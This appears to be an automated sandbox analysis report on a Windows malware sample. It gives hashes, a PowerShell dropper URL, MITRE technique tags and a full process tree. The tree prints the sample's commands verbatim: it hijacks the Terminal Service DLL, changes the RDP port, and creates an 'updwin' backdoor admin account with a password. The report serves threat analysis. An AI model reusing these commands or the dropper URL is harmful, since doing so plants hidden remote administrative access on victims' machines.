5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a

Analysis

max time kernel
37s
max time network
112s
platform
windows10_x64
resource
win10v20201028
submitted
06-11-2020 11:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
Size

3.4MB
MD5

cb15ff552cc7a8f69df60d2d68c8c54d
SHA1

e9780d261ca4b8fbe3a2ca0cfaa587c6c642a8c8
SHA256

5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a
SHA512

d9689e28c8558390f76119fb6a1449b48e0bcae5fae49a495c8cd3f9accc0eedd9d8a9d853977faee45ac82fcfbaa76e183876ca11841fa659bbe4dd625bacba

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
20	2604	powershell.exe
22	2604	powershell.exe
23	2604	powershell.exe
24	2604	powershell.exe
26	2604	powershell.exe
28	2604	powershell.exe
30	2604	powershell.exe
32	2604	powershell.exe
34	2604	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

3092 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

1636
1636

pid	process
1636
1636

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4vlmj0u5.1nr.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC05B.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tjm0j40u.tgx.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03A.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC06B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC019.tmp	powershell.exe

Modifies data under HKEY_USERS 217 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4400 reg.exe
Runs net.exe

pid	process
4400	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

616
616

pid	process
616
616

Suspicious use of AdjustPrivilegeToken 77 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe
Token: 35	3092	powershell.exe
Token: 36	3092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe
Token: 35	3092	powershell.exe
Token: 36	3092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3092	powershell.exe
Token: SeSecurityPrivilege	3092	powershell.exe
Token: SeTakeOwnershipPrivilege	3092	powershell.exe
Token: SeLoadDriverPrivilege	3092	powershell.exe
Token: SeSystemProfilePrivilege	3092	powershell.exe
Token: SeSystemtimePrivilege	3092	powershell.exe
Token: SeProfSingleProcessPrivilege	3092	powershell.exe
Token: SeIncBasePriorityPrivilege	3092	powershell.exe
Token: SeCreatePagefilePrivilege	3092	powershell.exe
Token: SeBackupPrivilege	3092	powershell.exe
Token: SeRestorePrivilege	3092	powershell.exe
Token: SeShutdownPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeSystemEnvironmentPrivilege	3092	powershell.exe
Token: SeRemoteShutdownPrivilege	3092	powershell.exe
Token: SeUndockPrivilege	3092	powershell.exe
Token: SeManageVolumePrivilege	3092	powershell.exe
Token: 33	3092	powershell.exe
Token: 34	3092	powershell.exe
Token: 35	3092	powershell.exe
Token: 36	3092	powershell.exe

Suspicious use of WriteProcessMemory 68 IoCs

Processes:

5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4636 wrote to memory of 3092	4636	5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe	powershell.exe
PID 4636 wrote to memory of 3092	4636	5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe	powershell.exe
PID 3092 wrote to memory of 1764	3092	powershell.exe	csc.exe
PID 3092 wrote to memory of 1764	3092	powershell.exe	csc.exe
PID 1764 wrote to memory of 4288	1764	csc.exe	cvtres.exe
PID 1764 wrote to memory of 4288	1764	csc.exe	cvtres.exe
PID 3092 wrote to memory of 4416	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 4416	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 4400	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 4400	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 500	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 500	3092	powershell.exe	reg.exe
PID 3092 wrote to memory of 648	3092	powershell.exe	net.exe
PID 3092 wrote to memory of 648	3092	powershell.exe	net.exe
PID 648 wrote to memory of 904	648	net.exe	net1.exe
PID 648 wrote to memory of 904	648	net.exe	net1.exe
PID 3092 wrote to memory of 364	3092	powershell.exe	cmd.exe
PID 3092 wrote to memory of 364	3092	powershell.exe	cmd.exe
PID 364 wrote to memory of 812	364	cmd.exe	cmd.exe
PID 364 wrote to memory of 812	364	cmd.exe	cmd.exe
PID 812 wrote to memory of 1056	812	cmd.exe	net.exe
PID 812 wrote to memory of 1056	812	cmd.exe	net.exe
PID 1056 wrote to memory of 1216	1056	net.exe	net1.exe
PID 1056 wrote to memory of 1216	1056	net.exe	net1.exe
PID 3092 wrote to memory of 1404	3092	powershell.exe	cmd.exe
PID 3092 wrote to memory of 1404	3092	powershell.exe	cmd.exe
PID 1404 wrote to memory of 1412	1404	cmd.exe	cmd.exe
PID 1404 wrote to memory of 1412	1404	cmd.exe	cmd.exe
PID 1412 wrote to memory of 1492	1412	cmd.exe	net.exe
PID 1412 wrote to memory of 1492	1412	cmd.exe	net.exe
PID 1492 wrote to memory of 1584	1492	net.exe	net1.exe
PID 1492 wrote to memory of 1584	1492	net.exe	net1.exe
PID 1960 wrote to memory of 2240	1960	cmd.exe	net.exe
PID 1960 wrote to memory of 2240	1960	cmd.exe	net.exe
PID 2240 wrote to memory of 2376	2240	net.exe	net1.exe
PID 2240 wrote to memory of 2376	2240	net.exe	net1.exe
PID 2484 wrote to memory of 2536	2484	cmd.exe	net.exe
PID 2484 wrote to memory of 2536	2484	cmd.exe	net.exe
PID 2536 wrote to memory of 2608	2536	net.exe	net1.exe
PID 2536 wrote to memory of 2608	2536	net.exe	net1.exe
PID 3116 wrote to memory of 4600	3116	cmd.exe	net.exe
PID 3116 wrote to memory of 4600	3116	cmd.exe	net.exe
PID 4600 wrote to memory of 2628	4600	net.exe	net1.exe
PID 4600 wrote to memory of 2628	4600	net.exe	net1.exe
PID 4620 wrote to memory of 184	4620	cmd.exe	net.exe
PID 4620 wrote to memory of 184	4620	cmd.exe	net.exe
PID 184 wrote to memory of 4532	184	net.exe	net1.exe
PID 184 wrote to memory of 4532	184	net.exe	net1.exe
PID 2872 wrote to memory of 1332	2872	cmd.exe	net.exe
PID 2872 wrote to memory of 1332	2872	cmd.exe	net.exe
PID 1332 wrote to memory of 4632	1332	net.exe	net1.exe
PID 1332 wrote to memory of 4632	1332	net.exe	net1.exe
PID 4468 wrote to memory of 2572	4468	cmd.exe	net.exe
PID 4468 wrote to memory of 2572	4468	cmd.exe	net.exe
PID 2572 wrote to memory of 1316	2572	net.exe	net1.exe
PID 2572 wrote to memory of 1316	2572	net.exe	net1.exe
PID 2560 wrote to memory of 4496	2560	cmd.exe	WMIC.exe
PID 2560 wrote to memory of 4496	2560	cmd.exe	WMIC.exe
PID 4932 wrote to memory of 4056	4932	cmd.exe	WMIC.exe
PID 4932 wrote to memory of 4056	4932	cmd.exe	WMIC.exe
PID 1532 wrote to memory of 688	1532	cmd.exe	cmd.exe
PID 1532 wrote to memory of 688	1532	cmd.exe	cmd.exe
PID 688 wrote to memory of 2604	688	cmd.exe	powershell.exe
PID 688 wrote to memory of 2604	688	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
"C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4636

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5190.tmp" "c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMP"
4⤵
PID:4288

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:4416

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:4400

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:500

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:904

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1216

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1584

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4188

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:4128

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin Ghasar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\system32\net.exe
net.exe user updwin Ghasar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin Ghasar4f5 /del
3⤵
PID:2376

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin L6kbkYfK /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\system32\net.exe
net.exe user updwin L6kbkYfK /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin L6kbkYfK /add
3⤵
PID:2608

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
3⤵
PID:2628

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:4532

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" updwin /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
3⤵
PID:4632

C:\Windows\System32\cmd.exe
cmd /C net.exe user updwin L6kbkYfK
1⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\system32\net.exe
net.exe user updwin L6kbkYfK
2⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user updwin L6kbkYfK
3⤵
PID:1316

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
PID:4496

C:\Windows\System32\cmd.exe
